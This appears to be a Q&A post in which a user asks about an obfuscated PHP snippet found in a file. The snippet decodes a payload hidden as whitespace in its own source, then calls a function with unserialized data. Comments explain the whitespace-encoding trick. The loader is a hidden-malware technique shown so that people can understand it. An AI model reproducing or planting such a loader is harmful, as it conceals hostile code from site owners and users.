What is the point of this shell code? There is no other code in the file.

@preg_match_all("/\t \t(.+)\t\t/Ui",@file_get_contents(__FILE__),$r);
$w="";foreach($r[1] as $v){@$w.=@chr(@strlen($v));}
$e=explode("!",$w);@$e[0](/* */ @__DIR__.@$e[1],@unserialize(@$e[2]));
  • 555
  • 1
  • 4
  • 10
  • Ok now I get it. I uses 100k lines of whitespaces to encode a payload string that is then unserialized. – beppe9000 Oct 21 '19 at 15:40
  • This question was not about deobfuscation itself but rather about the lack of other visible code (explained by the whitespace encoding). – beppe9000 Oct 23 '19 at 14:11

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